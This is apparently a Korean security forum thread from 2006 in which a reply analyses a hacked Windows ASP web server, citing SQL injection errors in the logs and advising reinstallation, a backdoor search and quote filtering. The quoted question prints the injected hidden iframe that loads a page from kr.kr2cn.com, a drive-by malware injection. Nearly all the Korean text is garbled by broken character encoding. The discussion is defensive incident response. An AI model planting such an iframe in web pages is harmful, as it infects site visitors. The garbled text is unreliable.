Å©·¡Å· ÇÇÇØ

 423, 1/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=240 [º¹»ç]



soarrr´Ô ¿À·£¸¸ÀÔ´Ï´Ù.

Windows + ASP °è¿­ÀÇ À¥¼­¹ö´Â ´ë´Ù¼ö°¡ SQL Injection Ãë¾àÁ¡¿¡ ÀÇÇÏ¿©
°ø°ÝÀ» ´çÇÕ´Ï´Ù.

SQL Injection °ø°ÝÀº "³ª '¿Í °°Àº Àο빮ÀÚ(quote)·Î ¼öÇàµÇ±â ¶§¹®¿¡
·Î±×¿¡¼­ ÀÌ °ªÀ» ±âÁØÀ¸·Î °Ë»ö/ºÐ¼®À» Çغ¸½Ã¸é µË´Ï´Ù.

¿Ã·Á ÁֽŠ·Î±×¸¦ º¸¸é,

GET /alumni/search/search/index.asp |25|80040e14|¿­_À̸§_'region'ÀÌ(°¡)_À߸øµÇ¾ú½À´Ï´Ù.
GET /gs/notice/view.asp seq=|25|80040e14|ÁÙ_1:_'='_±ÙóÀÇ_±¸¹®ÀÌ_À߸øµÇ¾ú½À´Ï´Ù.

¿Í °°ÀÌ SQL Injection °ø°Ý ÈçÀûÀÌ ³²¾ÆÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.
À§Ã³·³ SQL error°¡ Ãâ·ÂµÇ´Â »óȲÀ̶ó¸é SQL Injection °ø°Ý¿¡ ÀÌ¹Ì Ãë¾àÇÑ
»óÅÂÀÓÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

Å©·¡Å· ÇÇÇØ ÈÄ¿£ ¼­¹ö¸¦ À缳ġÇÏ´Â °ÍÀÌ °¡Àå ÁÁÀ¸¸ç, WEB ¼Ò½º¿¡ ¹éµµ¾î°¡ Ãß°¡
µÇÁö´Â ¾Ê¾Ò´ÂÁö ƯÁ¤ ¹®ÀÚ¿­(CreateObject, .Run)°ú ÃÖ±Ù ³¯Â¥·Î °Ë»öÀ» Çغ¸½Ã±â
¹Ù¶ø´Ï´Ù.

±×¸®°í SQL Injection Ãë¾àÁ¡ÀÌ ÀÖ´Â ¼Ò½º´Â ASP Ä¿¹Â´ÏƼ »çÀÌÆ® µîÀ» Âü°íÇÏ¿©
"³ª '¿Í °°Àº Àο빮ÀÚ¸¦ ÇÊÅ͸µÇϵµ·Ï ÆÐÄ¡ÇÏ¼Å¾ß ÇÕ´Ï´Ù.



===============================================================================
>¾È³çÇϼ¼¿ä.. ¿À·¡°£¸¸ÀÔ´Ï´Ù..
>Àá½Ã È°µ¿ÇÏ´Ù ÀáÀûÇعö¸®´Ù ÀÌ·¸°Ô ¿°Ä¡¾øÀÌ µµ¿òÀ» ¾ò°íÀÚ µ¹¾Æ¿Ô½À´Ï´Ù..
>
>´Ù¸§ÀÌ ¾Æ´Ï¶ó.. windows ¼­¹ö 2´ë°¡ index.asp ÆÄÀÏÀÌ º¯°æµÇ¾ú½À´Ï´Ù..
>(<iframe src="http://kr.kr2cn.com/index.htm" width="0" height="0" frameborder="0"></iframe>) <- »ðÀÔ
>ÄÚµå Á¦ÀÏ ÇÏ´Ü¿¡ iframe À¸·Î Äڵ尡 »ðÀԵǾú´Âµ¥..
>º¯°æ³¯Â¥°¡ Á¦°¢±â 2005³â 12¿ù°ú 2006³â 6¿ù °æÀÔ´Ï´Ù..
>¹°·Ð »ç°í´Â ÃÖ±Ù¿¡ ¹ß»ýÇÑ°ÍÀ¸·Î ÃßÁ¤µË´Ï´Ù¸¸..(¾Æ´Ò¼öµµ ÀÖ½À´Ï´Ù..)
>
>¿ì¼± ÇÑ ¼­¹ö¸¦ º¸¸é ¾Ë¼ö¾ø´Â °èÁ¤(s-1-5-21-1454055633-2705038733-166218806..) À̶ó°í index.asp ÆÄÀÏ¿¡ º¸¾È Á¤º¸¿¡ °èÁ¤ÀÌ Ãß°¡µÇ¾îÀÖ½À´Ï´Ù..(win2003)
>´Ù¸¥ ¼­¹ö´Â 2000¿¡´Â ¾ø±¸¿ä..
>
>°¢ °¢ ÆÄÀÏÀÌ »ý¼ºµÅ¾úÀ» ¶§ ±âÁØÀ¸·Î ·Î±×¸¦ ÷ºÎÇÕ´Ï´Ù..
>¾î¶² Ãë¾àÁ¡À¸·Î °¡´ÉÇß´ÂÁö Á¶¾ðÁ» ºÎŹµå¸®°Ú½À´Ï´Ù..
>·Î±×´Â plaza.snu.ac.kr/~heeya/logs.zip  ´Ù¿î¹ÞÀ¸½Ã¸é µË´Ï´Ù..
>
>¸Û¸Û´Ô Àß Áö³»¼ÌÁÒ?? ^^ ¹®¾ÈÀÎ»ç µå¸³´Ï´Ù..
===============================================================================

  Hit : 6633     Date : 2006/09/27 03:33



    
423   ¸®´ª½º ¹× ±âŸµîµî Áú¹® 2°³¸¸¿ä ..!![4]     ¿ÀŹ
09/23 3968
422   ³Ý¹ö½º¿Í ¸®´ª½º-_-;[3]     ¾Þ°Üº¸¼Ò
02/26 4152
421   ¤Ð¤Ð¤Ð[5]     ¾¾¿¡¸£
01/30 4289
420   ±Ã±ÝÇÕ´Ï´Ù[3]     ¾Æ½º¶õ
09/05 3712
419 ºñ¹Ð±ÛÀÔ´Ï´Ù  ÀÚ½ÅÀÇ IPÁÖ¼Ò´Â ¾î¶»°Ô ¾Ë¾Æ³»¿ä?     ¾ÆÀ̺ñÆ®
11/04 1
418   À©µµ¿ì¹®Á¦...     ¾ÆÀÌÇÁ¸®µå
11/03 3965
417   ¹«ÇÑÀçºÎÆÃ[7]     ½È¾î ³»°¡ÇÒ²¨¾ß
02/04 4043
416       [re] [re] ÇØÄ¿¿Í Å©·¡Ä¿[1]     ¼Û½Ã
11/18 4228
415     [re] ÇØÄ¿¿Í Å©·¡Ä¿[3]     ¼Û½Ã
11/18 4142
414   Áß±¹ syn_sent[3]     ¼Û½Ã
11/05 6145
413   °ÔÀÓ °èÁ¤À» º¸È£Çϱâ À§ÇÑ ¹æ¹ý.[12]     ¼ÒÅäÈ÷ÄÚ
01/30 4609
412     [re] ¾Æ½Ã´ÂºÐ ¾Ë·ÁÁÖ¼¼¿©....³Ý¹ö½º 1.7[2]     ¼ÒÀ¯
10/27 6690
411     [re] ¾û¶×ÇÑÁþÇÏ´Ù°¡ ¸ÁÇ߾ ÇïÇÁ¹Ì Çø®½º..ÈæÈæ[2]     ¼ÒÀ¯
10/18 5128
410     [re] ÇØÄð ¾Æµð ÇØÅ· -0-??     ¼ÒÀ¯
10/08 5004
409     [re] ±×·³ ÀÌ·±°æ¿ìµµ ÇØÅ·ÀÌ µÇ´ÂÁö¿ä     ¹«¼ÒÀ¯
12/20 4110
408     [re] ÇØÄ¿°¡ µÇ°í½ÍÀºµ¥[1]     ¹«¼ÒÀ¯
12/16 4173
407   Á¦°¡ ¿©±â¼­ ¸¸È­ º¸°íÀִµ¥ ¾î¶² ¹Ì±¹ÀÎ µÎ¸íÀ̼­ À̾߱âÇÏ°íÀÖ¾ú½À´Ï´Ù...[9]     ¹ÚÅÂÈ£
07/05 4851
406   ½ºÅäÄ¿°¡ Á¦ ÄÄÀ» ÇØÅ·ÇÏ´Â°Í °°¾Æ¿ä[14]     ¸ÞÅÚ
02/11 5218
    [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     ¸Û¸Û
09/27 6632
404       [re] [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[22]     ¸Û¸Û
06/28 10093
1 [2][3][4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org